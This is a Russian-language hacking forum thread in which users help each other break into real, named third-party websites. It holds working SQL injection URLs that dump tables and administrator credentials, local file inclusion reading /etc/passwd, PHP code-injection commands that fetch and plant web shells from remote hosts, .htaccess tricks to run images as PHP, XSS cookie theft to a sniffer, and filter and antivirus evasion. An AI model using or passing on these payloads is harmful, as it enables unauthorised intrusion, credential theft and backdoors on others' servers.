принтабльный парметр - 6

Cennarios
03.11.2012, 03:45
vaddd said:
http://www.artsnspirits.com/quick-signup.php?eventid=0%20union%20select%201,2,3,4,5, 6,7,8,9
принтабльный парметр - 6



http://www.artsnspirits.com/quick-signup.php?eventid=0+union+select+1,2,3,4,5,hex(ta ble_name),7,8,9+from+information_schema.tables+lim it+16,1--+

Дальше сам.

MaxFast
04.11.2012, 16:56
Раскрутил, спасибо всем кто откликнулся.

vaddd
04.11.2012, 17:16
id=(1)and(select 1 from(select count(*),concat((SELECT user_password from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--

Subquery returns more than 1 row

В чем трабл? имена колонок и таблиц таким способом узнал, а данные не извлекаются

qaz
04.11.2012, 17:31
vaddd said:
id=(1)and(select 1 from(select count(*),concat((SELECT user_password from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--
Subquery returns more than 1 row
В чем трабл? имена колонок и таблиц таким способом узнал, а данные не извлекаются




PHP:
id=(1)and(select 1 from(select count(*),concat( (SELECT substr(user_password,1,99)from users li mit 0,1),floor(rand(0)*2))x from information_sc hema.tables group by x)a)--

OxoTnik
04.11.2012, 23:04
qaz said:
такой вопросец есть шелл, права не очень полные, движок ворд пресс, немогу редачить морду, зато могу редачить все остальные файлы а также файлы в папка wp-includes ] wp-admin ] script ] куда можно влепить свой код чтобы он отобразился на главной??? уже что не перепробывал ничего не выходит


Можно отредактировать шаблон

Можно в папке wp-includes полазить и посмотреть какие из них инклудятся на главную страницу, и отредактировать его

Sat-hacker
06.11.2012, 22:56
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?

такие команды выполняються

system('ls -la');

system('rmdir hack');

system('mkdir hack');

system('id');

а вот

system('wget http://goomihas.narod.ru/testing.php')

winstrool
06.11.2012, 23:06
Sat-hacker said:
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
такие команды выполняються
system('ls -la');
system('rmdir hack');
system('mkdir hack');
system('id');
а вот
system('wget http://goomihas.narod.ru/testing.php')


воспользуйся пхп функцией copy();

пример:


PHP:
copy("http://localhost/shell.txt","tmp/shell.php");

Konqi
06.11.2012, 23:09
Sat-hacker said:
пользуюсь сканером Acunetix Web Vulnerability Scanner 8 он нашёл php injection,подскажите какой командой залить шел на сайт?
такие команды выполняються
system('ls -la');
system('rmdir hack');
system('mkdir hack');
system('id');
а вот
system('wget http://goomihas.narod.ru/testing.php')


слабо читать учебник по linux?

кури маны curl,wget,lynx, если система BSD то (fetch)

Sat-hacker
06.11.2012, 23:53
Спасибо.Параметр fetch помог.Konqi где можна скачать хорошие маны?

Konqi
07.11.2012, 00:05
Sat-hacker said:
Спасибо.Параметр fetch помог.Konqi где можна скачать хорошие маны?


в гугле

kacergei
07.11.2012, 09:24
Помогите со скулей, никак не получается из-за WAF

http://www.paladins.ru/deskart.php?cat=4&conk=-1

Ravenous
07.11.2012, 22:18
intertrey said:
Отснифал havij, к примеру такие запросы посылает
http://site/ambassadors/event.php?id=939
http://site/ambassadors/event.php?id=999999.9
http://site/ambassadors/event.php?id=939 and 1=1
http://site/ambassadors/event.php?id=939 and 1>1
http://site/ambassadors/event.php?id=939 and 1=1
http://site/ambassadors/event.php?id=939'
http://site/ambassadors/event.php?id=/*!30000 939*/
http://site/ambassadors/event.php?id=/*!40100 939*/
http://site/ambassadors/event.php?id=/*!50000 939*/
Зачем он как думаете сначала так проверяет and 1=1, патом так and 1>1 и патом снова and 1=1 какая тут логика может быть работы?
И еще интересно как такие комменты работают /*!30000 939*/ растолкуйте простым языком, результат вывода как по первой ссылке с простым 939


1) Проверяет наличие инъекции, т.к. and 1 = 1 возвращает истину, а and 1 > 1 - ложь, отсюда меняется размер или содержание страницы и т.о. проверяется наличие инъекции.

2)

Комментарии /*!int */ в котором, всё заключенное в данный комментарий будет интерпретироваться как SQL запрос если номер данной версии MySQL равен указанному числу int после восклицательного знака или больше.


Code:
SELECT pass/*!32302 ,login*/FROM users

Выведет столбец login если версия MySQL равна либо выше 3.23.02

ReV0LVeR
08.11.2012, 13:32
LFI


http://site.ru/index.php?razdel=17&module=%27../../../../../../../../../../../../../../etc/passwrd Warning: include(/var/www/hosts/default/avax/modules/\'etcpasswrd/module.php) [function.include]: failed to open stream: No such file or directory in /var/www/hosts/default/req/core.php on line 144 Warning: include() [function.include]: Failed opening '/var/www/hosts/default/avax/modules/\'etcpasswrd/module.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /var/www/hosts/default/req/core.php on line 144


что делать?

Prosta4ok
08.11.2012, 14:12
ReV0LVeR said:
что делать?


зачем кавычка в начале? да и вообще не факт что там есть LFI

ReV0LVeR
08.11.2012, 14:57
Prosta4ok , для того что-бы видеть ошибку. Проблема ни в том что уязвимости нет, проблема в фильтрации переменных. не фильтрует ":!@" и еще пару символов.

поэтому не получается подняться на каталоги выше.

Вопрос кто работал с протоколом "data:"

Есть возможность использовать его при LFI?

Какие еще варианты обхода фильтрации при локальном инклуде?

Ravenous
08.11.2012, 15:03
intertrey said:
Спасибо за разъяснение, интересный способ определения предварительный версии mysql. Подскажите такой вопрос.
Мне хочется понять как он работает на начальном этапе, чтобы для себя выработать наиболее оптимальный и точный механизм определения есть ли на сайте sqli инъекция или нету. А то существующие утилиты, как то удручают для массового чека.
Мне интересно, как havij определяет, что данный тип динамически подставляемого параметра, является или числовым или строковым? Как за наименьшее количество запросов, это можно определить в принципе?
Если кто нить видел достаточно полную методику определения возможности существования sqli инъекции, то поделитесь, типа там:
Проверяем на кавычки, смотрим разницу в размере. Если да, то хорошо, пробиваем по ошибкам mysql вдруг есть, далее определяем тип переменной строковая или числовая, подставляем сравнения сначала or 1>1 истина или там or 1>2 ложь, в зависимости от типа переменной запрос может выглядеть так: 15 'и' blabla '='blabla Можем там проверить на order by c group by. Далее перебираем, ищем нужные столбы и если там вывелось нужное определенное слово ~'version()'~ ~'database()'~ то у такого сайта в 80% есть sqli к примеру. Blind в расчёт не беру.


Ну в mysql если параметр число, то тип числовой,если строка то строковой, как правило. Логично же?) В факе от Dr. Zero(на рдоте) всё описано и разжёвано, как определять sqli и прочие. Если числовой тип, то делай ?id=5-1, если есть инъекция, и не фильтруется минус, то выведется 4-ая новость или т.п.

Алгоритм выведешь на основе своей практики. Читайте больше, всё разжёвано.


ReV0LVeR said:
Prosta4ok , для того что-бы видеть ошибку. Проблема ни в том что уязвимости нет, проблема в фильтрации переменных. не фильтрует ":!@" и еще пару символов.
поэтому не получается подняться на каталоги выше.
Вопрос кто работал с протоколом "data:"
Есть возможность использовать его при LFI?
Какие еще варианты обхода фильтрации при локальном инклуде?


Чтобы использовать wrappers, нужно чтобы до переменной в функции ничего небыло(пути). Типо include ($_GET['p'].'.php');

В твоём случае не получится.

MaxFast
08.11.2012, 20:43
Как обойти редирект на index.php при MySQL ошибке?

Выключение редиректа в браузере не помогает.

winstrool
08.11.2012, 21:00
MaxFast said:
Как обойти редирект на index.php при MySQL ошибке?
Выключение редиректа в браузере не помогает.


Смотря какая ситуация, если редиректит при sql-иньекции то может редиректить на вывод или тру результат, обьесни конкретную ситуацию...

VY_CMa
08.11.2012, 21:15
MaxFast said:
Как обойти редирект на index.php при MySQL ошибке?
Выключение редиректа в браузере не помогает.


90% что нужно использовать extravalue()

MaxFast
08.11.2012, 21:15
winstrool said:
Смотря какая ситуация, если редиректит при sql-иньекции то может редиректить на вывод или тру результат, обьесни конкретную ситуацию...


Вообщем есть сайт:


http://www.igorkuljeric.com/news.php?kat_id=163


Если изменить id на несуществующий - редирект на index.php.

Так же если начать раскручивать инъецию происходит редирект, даже если все верно.

BigBear
09.11.2012, 09:10
VY_CMa said:
90% что нужно использовать extravalue()


Если версия Мускула

wanttoask
09.11.2012, 13:18
есть сайт с xss уязвимостью. Можно через нее на сайт шэлл залить?

MaxFast
09.11.2012, 13:22
wanttoask said:
есть сайт с xss уязвимостью. Можно через нее на сайт шэлл залить?


Воруй печенья, иди в админку, лей шелл.

wanttoask
09.11.2012, 13:24
А можно подробнее? я с xss пока не очень дружу.

wanttoask
09.11.2012, 13:52
киньте какую-нибудь статейку по xss

qaz
09.11.2012, 13:56
wanttoask said:
А можно подробнее? я с xss пока не очень дружу.


читай

/thread322832.html

kingbeef
09.11.2012, 14:37
wanttoask said:
киньте какую-нибудь статейку по xss


/thread20140.html

wanttoask
09.11.2012, 16:01
У меня в браузере хсс не отображается(не показывает окошко алерт) но ie пишет: возможность межсайтового скриптинга заблокирована. Что сделать чтобы окошко изобразилось?

wanttoask
09.11.2012, 16:08
В хроме

kingbeef
09.11.2012, 16:13
В хроме и ie>8 не работают пасивные из-за фильтров.

wanttoask
09.11.2012, 16:25
А можно их отключить?

wanttoask
09.11.2012, 16:39
Кому не жалко, скиньте какой нить сайт с SQL инъекцией.

qaz
09.11.2012, 16:42
wanttoask said:
Кому не жалко, скиньте какой нить сайт с SQL инъекцией.


да хоть милион /thread21336.html

qaz
09.11.2012, 17:11
такая проблема, залил шелл через майскул, в .htaccess запрешено в этой деректории(картинки) использовать php, залил глебже в дерикторию .htaccess с содержимым

AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js

AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg

в итоге файлы в форматах .jpg и .js выполняют php, после долгих мучений от того что ничего не получалось я додумался посмотреть phpinfo(); и увидел приичину моих бед allow_url_fopen Off что блин ешо можно придумать?

попугай
09.11.2012, 17:34
qaz said:
такая проблема, залил шелл через майскул, в .htaccess запрешено в этой деректории(картинки) использовать php, залил глебже в дерикторию .htaccess с содержимым
AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js
AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg
в итоге файлы в форматах .jpg и .js выполняют php, после долгих мучений от того что ничего не получалось я додумался посмотреть phpinfo(); и увидел приичину моих бед allow_url_fopen Off что блин ешо можно придумать?


ты же говоришь, что твои шеллы с .js и .jpg расширением исполняются как php. В чем проблема то?

qaz
09.11.2012, 17:50
попугай said:
ты же говоришь, что твои шеллы с .js и .jpg расширением исполняются как php. В чем проблема то?


я не могу изменьть инфу в файлах которые находятся выше по каталогу

например

выполняю код


PHP:
$a=file_get_contents("../.htaccess"); echo$a;



показывает Deny from all

далее выполняю код


PHP:
file_put_contents("../.htaccess","AddType application/x-httpd-php .js AddHandler application/x-httpd-php .js

AddType application/x-httpd-php .jpg AddHandler application/x-httpd-php .jpg");



реакции ноль

также


PHP:
file_put_contents("../../index.php","aaa");

реакции ноль, правятся только те файлы что лежат в етом же каталоге

kacergei
10.11.2012, 20:12
В общем возникла ситуация, получил доступ в админку в управление файлами смог спокойно загрузить свой php shell, но возникает проблема, при обращение по прямой ссылке предлагает скачать файл, попытался загрузить .htacces в ответ получил, такое сообщение: "Произошла ошибка!

- Название файла не соответствует шаблону ."

Есть идеи?

Seo_pharmacy
11.11.2012, 04:31
Сорри , за глупый вопрос.

При помощи активной xss , возможно перенаправление трафика ?

Всмысле если обнаружил активную ксс , могу ли я сливать траф с этого сайта ?

wanttoask
11.11.2012, 14:26
Если кто знает, подскажите бесплатный IRC сервер.

wanttoask
11.11.2012, 14:36
Если есть пассивная ксс, и я отправил кому-то адрес со скриптом который ворует печеньки, то куда они сохранятся(печеньки)? В изображение?

Prosta4ok
11.11.2012, 14:38
wanttoask said:
Если есть пассивная ксс, и я отправил кому-то адрес со скриптом который ворует печеньки, то куда они сохранятся(печеньки)? В изображение?


надо на снифер гнать куки, в картинку они не как не сохранятся

wanttoask
11.11.2012, 15:23
и как это сделать?

wanttoask
11.11.2012, 15:28
Сколько статей по xss не читал, нигде не встречал никакого сниффера.

qaz
11.11.2012, 15:46
wanttoask said:
Сколько статей по xss не читал, нигде не встречал никакого сниффера.


ты их вобще читал?

/showthread.php?t=20140

ето для кого написано?


Сниферы для ХСС:
Скрипты сниффера (вебсниффера) и сайты со снифферами.
Обсуждение темы Скрипты вебсниффера
Скрипт CGI-сниффера
ProTeam Sniffer by Developer aka RUSH

Seo_pharmacy
11.11.2012, 15:47
Сколько статей по xss не читал, нигде не встречал никакого сниффера.


/thread104591.html в самом низу смотри...

Мне кто то может помочь ? Есть ли возможность , с помощью активки , внедрить ифрейм ?

seozone
11.11.2012, 17:26
может кто подробнее разложить, как спрятать шелл с помощью .htaccess ?

Prosta4ok
11.11.2012, 17:37
Seo_pharmacy said:
Мне кто то может помочь ? Есть ли возможность , с помощью активки , внедрить ифрейм ?


а сам тег фильтруется? можно попробовать добавить на страницу через innerHTML

Sat-hacker
11.11.2012, 21:40
Подскажите какой shell лучше заливать,чтоб его не палил антивирус и разные скрипты?

Prosta4ok
11.11.2012, 21:44
Sat-hacker said:
Подскажите какой shell лучше заливать,чтоб его не палил антивирус и разные скрипты?


самописный

Sat-hacker
11.11.2012, 23:04
Prosta4ok said:
самописный


А из таких что есть в паблике?Потому что писать только по русски могу.

qaz
11.11.2012, 23:10
Seo_pharmacy said:
/thread104591.html в самом низу смотри...
Мне кто то может помочь ? Есть ли возможность , с помощью активки , внедрить ифрейм ?


а в чём проблема? вставляещь код фрейма и всё


seozone said:
может кто подробнее разложить, как спрятать шелл с помощью .htaccess ?


никак


Sat-hacker said:
А из таких что есть в паблике?Потому что писать только по русски могу.


юзай всо и не парся поетому вопросу вобще

Sat-hacker
12.11.2012, 00:07
qaz ним и пользуюсь но где то читал что он много следов в логах оставляет,и антивирусами палиться.

BigBear
12.11.2012, 12:55
Логи сильно нагружают шеллы, передающие команды посредством Get-запросов, последняя версия WSO таковой не является.

IMMORTAL_S
12.11.2012, 21:21
Всем привет!

В UPDATE(MySQL) есть sqlinj. Как наиболее эффективно ей воспользоваться.

Есть кое какие ограничения:

-вывода ошибки нет, только алерт, что ошипке

-в поле зависать можно только число(если сделать подстановку)

Что пробовал:


Code:
'+(select(user()))+'

результат - пусто


Code:
a'+(select(user()))+'b

результат - пусто


Code:
1'+(select(3))+'2

результат 6


Code:
1'+(select('c'))+'2

результат 3


Code:
a'+(select('3'))+'b

результат 3


Code:
1'+(select(version()))+'2

результат - 8.1


Конечно можно blind'ануть, но придумал такой вариант:


Code:
'+(select(Replace(Replace(Replace(Replace(Replace( Replace(hex(user()),'F','006'),'E','005'),'D','004 '),'C','003'),'B','002'),'A','001')))+'

Если текст небольшой,

результат - 00419100400021004182

иначе - 4.19100400021004e+17

По сравнению с blind'ом, вариант лучше, но и здесь есть минусы, т.к. при обратной конвертации 4.19100400021004e+17 дает 00419100400021004000

Еще была мысль закомментить оставшуюся часть запроса и update'нуть другое поле, но опасаюсь засветиться, т.к. хз что в where. Хотя по косвенным признакам можно id вытянуть, но боюсь он не цифровой.

Есть еще предложения, что можно сделать?

Sat-hacker
12.11.2012, 21:33
BigBear said:
Логи сильно нагружают шеллы, передающие команды посредством Get-запросов, последняя версия WSO таковой не является.


Подскажи пожалуйста где скачать последнюю версию?Не могу найти.

Konqi
12.11.2012, 21:46
Sat-hacker said:
Подскажи пожалуйста где скачать последнюю версию?Не могу найти.


пожалуйста, сир. долго искали что не нашли? гугл сдох?

запрос "site:forum.antichat.ru wso" больше не работает?

/thread103155.html

Sat-hacker
13.11.2012, 00:02
Konqi да видел я эту версию но незнал что она последяя.

cipa21
13.11.2012, 02:20
Товарищи, есть идеи по поводу http://ironage-radio.com/' , можно как-то это использовать?

Konqi
13.11.2012, 03:09
cipa21 said:
Товарищи, есть идеи по поводу http://ironage-radio.com/' , можно как-то это использовать?


http://ironage-radio.com/'and(select*from(select(name_const(version(),1)),n ame_const(version(),1))a)and(1)='1+--+

extractvalue тоже катит, пробуй сам

Kolyan333
13.11.2012, 22:15
Всем привет. Нашел xss но вот

фильтр съедает всё что в скобках <> сначала думал съедает скрипт

проверил съедает всё что внутри <> как обойти фильтрацию, помогите

пожалуйста

BigBear
14.11.2012, 07:49
Kolyan333 said:
Всем привет. Нашел xss но вот
фильтр съедает всё что в скобках <> сначала думал съедает скрипт
проверил съедает всё что внутри <> как обойти фильтрацию, помогите
пожалуйста


Надо смотреть на месте. Двойные

Kolyan333
14.11.2012, 09:37
нет двойные тоже не пропускают. Когда впереди пишу >>> то пропускает но скрипт не выполняется. Как понял фильтр находит открытие и закрытые скобок и удаляет .

Kolyan333
14.11.2012, 09:40
когда пишу так >> ript>alert("")ript> то вижу это после фильтрации alert("") но сам скрипт не выполняется

BigBear
14.11.2012, 09:42
Kolyan333 said:
когда пишу так >> ript>alert("")ript> то вижу это после фильтрации alert("") но сам скрипт не выполняется


Нужен сам скрипт для тестирования. Вариантов куча может быть.

Kolyan333
14.11.2012, 13:10
вот сайт galaxy.mobstudio.ru/web (http://galaxy.mobstudio.ru/web/) в любой поле вводишь кроме смс в эфир то съедает всё что внутри скобок. проверь пожалуйста

aadktnbaov
14.11.2012, 16:45
прошу помощи для совершения sql-инъекции

Всем доброго времени суток.

Прошу помощи извлечь полезную информацию из базы данных, используя sql-инъекцию.

Недавно на некотором сайте обнаружил возможность sql-инъекции:

в передаваемом post-параметре НЕ фильтруется обратный слэш ( \ ; ascii-код = 92 = 0x5C ).

Если заполнить текстовый input с именем ID значением 12345 , а другой текстовый input с именем VarXXX значением 67890\ и за-SUBMIT-ить форму - то сайт вернет следущую ошибку:

Ошибка сервера Базы Данных MySQL!

Ошибка:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''67890\' AND `id`=12345' at line 1

Номер ошибки:

1064

и далее подробности ошибки (ошибочный sql-запрос):

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='67890\' AND `id`=12345

"Одинарная" кавычка ( ' = апостроф ; ascii-код = 39 = 0x27 ) и "двойная" кавычка ( " ; ascii-код = 34 = 0x22 ) , а также + (знак плюса) фильтруются (вырезаются) ,вероятно, на уровне php.

Если , например, заполнить текстовый input с именем ID значением 5'4321 , а другой текстовый input с именем VarXXX значением 0'9876\ - то сайт вернет ошибку со следущими подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=54321

Если , например, заполнить текстовый input с именем ID значением 5"4321 , а другой текстовый input с именем VarXXX значением 0"9876\ - то сайт вернет ошибку с теми же самыми подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=54321

Символы !#$%&()*,-./:;?@[\]^_`{|}~ , а также пробел не фильтруются

Если , например, заполнить текстовый input с именем ID значением 777 , а другой текстовый input с именем VarXXX значением 11!#$%&()*,-./:;?@[\]^_`{|}~ 22 - то сайт вернет ошибку со следущими подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='11!#$%&()*,-./:;?@[\]^_`{|}~ 22\' AND `id`=777

Подобным образом выяснилось, что значения из текстового input-а с именем ID приводятся только к числовому виду таким образом, что первый в строке любой нецифровой символ (или буква) , а также всё, что идёт после него (или неё), - вырезается.

Если , например, заполнить текстовый input с именем ID значением 123d456 , а другой текстовый input с именем VarXXX значением 09876\ - то сайт вернет ошибку со следущими подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=123

Если же , например, заполнить текстовый input с именем ID значением 0xff , а другой текстовый input с именем VarXXX значением 09876\ - то сайт вернет ошибку со следущими подробностями:

SELECT `id`,`varAAA`,`varBBB`,`varCCC`,`varDDD` FROM `tableXXX` WHERE `varXXX`='09876\' AND `id`=0

Что можно полезного поиметь в этом случае ?

P.S.

названия INPUT-ов , а также названия столбцов и таблицы в БД умышленно мною изменены

aadktnbaov
14.11.2012, 17:19
IMMORTAL_S said:
Конечно можно blind'ануть, но придумал такой вариант:

Code:
'+(select(Replace(Replace(Replace(Replace(Replace( Replace(hex(user()),'F','006'),'E','005'),'D','004 '),'C','003'),'B','002'),'A','001')))+'

Если текст небольшой,
результат -
00419100400021004182
иначе -
4.19100400021004e+17
По сравнению с blind'ом, вариант лучше, но и здесь есть минусы, т.к. при обратной конвертации
4.19100400021004e+17
дает 00
419100400021004
000


а что мешает тебе извлекать любую необходимую тебе строку по одному символу ?

ord(mid(user(),1,1)) - ascii-код первого символа пльзователя

ord(mid(user(),2,1)) - ascii-код второго символа пльзователя

ord(mid(user(),3,1)) - ascii-код третьего символа пльзователя

и .т.д.

P.S. учи "мат. часть"

функция MID() = SUBSTRING()

Return a substring starting from the specified position


MID(str,pos,len) is a synonym for SUBSTRING(str,pos,len).

SUBSTRING(str,pos), SUBSTRING(str FROM pos), SUBSTRING(str,pos,len), SUBSTRING(str FROM pos FOR len)

The forms without a len argument return a substring from string str starting at position pos. The forms with a len argument return a substring len characters long from string str, starting at position pos. The forms that use FROM are standard SQL syntax. It is also possible to use a negative value for pos. In this case, the beginning of the substring is pos characters from the end of the string, rather than the beginning. A negative value may be used for pos in any of the forms of this function.

For all forms of SUBSTRING(), the position of the first character in the string from which the substring is to be extracted is reckoned as 1.

mysql> SELECT SUBSTRING('Quadratically',5);

-> 'ratically'

mysql> SELECT SUBSTRING('foobarbar' FROM 4);

-> 'barbar'

mysql> SELECT SUBSTRING('Quadratically',5,6);

-> 'ratica'

mysql> SELECT SUBSTRING('Sakila', -3);

-> 'ila'

mysql> SELECT SUBSTRING('Sakila', -5, 3);

-> 'aki'

mysql> SELECT SUBSTRING('Sakila' FROM -4 FOR 2);

-> 'ki'

This function is multi-byte safe.

If len is less than 1, the result is the empty string.

функция ORD() = ASCII() Return character code for leftmost character of the argument

If the leftmost character of the string str is a multi-byte character, returns the code for that character, calculated from the numeric values of its constituent bytes using this formula:

(1st byte code)

+ (2nd byte code * 256)

+ (3rd byte code * 2562) ...

If the leftmost character is not a multi-byte character, ORD() returns the same value as the ASCII() function.

mysql> SELECT ORD('2');

-> 50

ASCII(str) - аналог полный аналог функции ord() , но для строк , состоящих из 8-битных символов

Returns the numeric value of the leftmost character of the string str. Returns 0 if str is the empty string. Returns NULL if str is NULL. ASCII() works for 8-bit characters.

mysql> SELECT ASCII('2');

-> 50

mysql> SELECT ASCII(2);

-> 50

mysql> SELECT ASCII('dx');

-> 100

qaz
14.11.2012, 17:29
1)кто в курсах как залить шелл через TinyBrowser, в гугле ненашол

IMMORTAL_S
15.11.2012, 16:55
aadktnbaov said:
P.S. учи "мат. часть"


Я спрашивал - Как наиболее эффективно ей воспользоваться.

А под blind'ануть и имелось в виду та мат. часть, которую ты здесь расписал.. может только определение неподходящее я выбрал.

Пока делаю по своему, вытягиваю по несколько символов за раз.

MaxFast
15.11.2012, 19:12
Вопрос по LFI.


http://www.epoka.edu.al/new/index.php?p=


Ну вот qaz пытался мне помочь, но не смог.

Помогите выжать максимум из LFI, не получается.

aadktnbaov
15.11.2012, 19:53
IMMORTAL_S said:
Я спрашивал - Как
наиболее эффективно
ей воспользоваться.
А под blind'ануть и имелось в виду та мат. часть, которую ты здесь расписал.. может только определение неподходящее я выбрал.
Пока делаю по своему, вытягиваю по несколько символов за раз.



BLIND-ануть - это значит применить sql-инъекцию "вслепую"

без вывода резьтата куда-либо в явном виде

см. перевод англ. слова "BLIND"

чаще всего подразумевает под собой применение инъекции с двояким резьтатом её исполнения ( true , false значение )

например, результат инъекции может быть либо "нормальной" страницей , либо пустой страницей

с помощью такой "слепой" инъекции можно методом "тупого" ПЕРЕБОРА (ну или "умного", если хорошо понимаешь , какие именно данные хочешь извлечь и как оптимизировать этот самый "тупой" подбор ) вытянуть нужные данные из базы

В Вашем же случае инъекция ни разу не BLIND

данные в базе Вы изменяете с помощью update-инъекции и затем можете увидеть изменения в явном виде

HEX-хуекс или BASE64 вместо желанного plain text - это уже не важно

из Вашего HEX-a даныне легко преобразовать к оригиналу (желанному plain text ).

aadktnbaov
15.11.2012, 20:08
IMMORTAL_S said:
Я спрашивал - Как
наиболее эффективно
ей воспользоваться.



могу посоветовать оптимизировать вытягивание даныне Вашим replace-ом

но не так

001 , 002 , 003 , 004, 005 , 006

вместо

a , b , с , d , e , f

а так

01 , 02 , 03, 04 , 05 , 06

вместо

a , b , с , d , e , f

врядли в изначальной строке будут символы с ascii-кодами , начинающимися на 0 в хексе

т.е. строка hex('admin') = 61646D696E

в вашем случае преобразуется в 616460469605

далее проанализировав по четности месторасположения нуля в строке , нетрудно понять где именно менялись буквенные символы хекса

p1oneer
16.11.2012, 02:30
Как можно реализовать FTP-соединение на шелле? Подскажите несложные способы или дайте ссылки, где есть мануалы по этому, буду очень благодарен.

mod_
16.11.2012, 03:16
Code:
http://www.basegroup.su/index.php?Page=../../../../../etc/passwd

в частности, есть какая либо утилита-скрипт которая приводит в читабельный вид файл passwd? спрашиваю чисто из-за любопытсва и на будущее. паролей то там нет как я понимаю? в даном случае используются shadow пароли?но получить доступк /etc/shadow на данном ресурсе при помощи LFI не представляется возможным.вобще какой толк от этого файла, если только это не какая то экзотическая рухлядь, где пароли ещё не вынесены из passwd?

shell_c0de
16.11.2012, 03:18
rooting -> cat /etc/passwd --> ftp connecting.

DyukiN
16.11.2012, 12:00
не получается залить шелл,т.е. я могу лить любые форматы,но они не работают как пхп,а открываются txt, как можно залиться?

p1oneer
16.11.2012, 17:16
shell_c0de said:
rooting -> cat /etc/passwd --> ftp connecting.


"passwd" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?

Konqi
16.11.2012, 17:23
p1oneer said:
"
passwd
" – не вижу такой каталог, хотя в etc вообще нет папок. Это значит у меня не хватает прав?


это значит что passwd Не каталог а файл, и тебе срочно надо курить книжку по linux. смекаешь?


intertrey said:
хм
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а у строковых также?
http://0214.by/catalog.php?id=130' AnD '1 ИСТИНА
http://0214.by/catalog.php?id=130' AnD '0 ЛОЖЬ
Это как аналоги сравнения для:
http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon ИСТИНА
http://0214.by/catalog.php?id=130' AnD 'hexon'>'hexjector ЛОЖЬ
Равнозначны или не?)


http://0214.by/catalog.php?id=130+and+0+union+select+1,version(), 3,4,5,6,7,8,9,10--+

внимательнее. смотри в тайтл

Konqi
16.11.2012, 18:28
intertrey said:
Эм. Я чуток о другом спросил, сайт просто для примера привел, мне не интересны ни колонки ни title
Вот это http://0214.by/catalog.php?id=130' AnD '1 и вот это http://0214.by/catalog.php?id=130' AnD 'hexon'='hexon одно и тоже по сути? Просто для себя скрипт пишу, вырабатываю оптимальный алгоритм под свои нужны. У меня на некоторых сайтах фильтруется и '=' и операторы сравнения '>'. Просто если Я хочу интежер сравнивать между собой, то могу указать вот так вот просто:
http://0214.by/catalog.php?id=130 AnD 1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 0 ЛОЖЬ
а не:
http://0214.by/catalog.php?id=130 AnD 1=1 ИСТИНА
http://0214.by/catalog.php?id=130 AnD 1>2 ЛОЖЬ
Также можно сделать для string? Справка от mysql http://www.mysql.ru/docs/man/Comparison_Operators.html не дала мне точного ответа)


and 1

and 0

такая конструкция работает не во всех СУБД

лучше and 1=1 / and 1=0

для string (MySQL)

SELECT * FROM `products` WHERE 'antichat' (empty set)

SELECT * FROM `products` WHERE 'antichat'='antichat' (true)

avegolove
17.11.2012, 00:19
Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?

vaddd
17.11.2012, 00:57
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%280x3c696e6a 5f646174613e,table_name,0x3c2f696e6a5f646174613e%2 9,4,5,6,7,8,9,10,11,12,13%20from%20information_sch ema.tables%20limit%2029,1

http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%28user,0x3a, pass,0x3a,email%29,4,5,6,7,8,9,10,11,12,13%20from% 20zp_administrators%20limit%200,1

WTF?

Konqi
17.11.2012, 02:05
avegolove said:
Дело в том что я залил шелл в раздел banners, но не могу перейти ни в какой раздел кроме этого, так-как ограничены права. Я слышал что можно залить файл htaccess прописав что-то и другие папки будут иметь полные права. Так ли это или есть другие способы открыть полные права на другие разделы?


ограниченные права на сервере? так как ты хочешь поднять права посредством .htaccces? тебе рутать надо а не htaccess заливать


vaddd said:
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%280x3c696e6a 5f646174613e,table_name,0x3c2f696e6a5f646174613e%2 9,4,5,6,7,8,9,10,11,12,13%20from%20information_sch ema.tables%20limit%2029,1
http://lakiauto.ee/templates/artikkel.php?KatID=100&ArtID=0%20union%20select%201,2,concat%28user,0x3a, pass,0x3a,email%29,4,5,6,7,8,9,10,11,12,13%20from% 20zp_administrators%20limit%200,1
WTF?


читаем статью нолика. несколько раз.

avegolove
17.11.2012, 12:51
Ограниченные а как можно поднять права?

qaz
17.11.2012, 16:39
avegolove said:
Ограниченные а как можно поднять права?


тебе ж сказали, рутать

seozone
17.11.2012, 17:10
непойму, как юзать сплойты с http://www.exploit-db.com

Prosta4ok
17.11.2012, 18:17
seozone said:
непойму, как юзать сплойты с http://www.exploit-db.com


конкретизируй свой вопрос.. там много разных сплоитов, на разных языках

tester_new
17.11.2012, 20:34
seozone said:
непойму, как юзать сплойты с http://www.exploit-db.com


Python:

./exploit.py -some key

C/C++

gcc –o exploit exploit.c #это очень грубый пример

читай про gcc компилятор

seozone
18.11.2012, 01:12
Prosta4ok said:
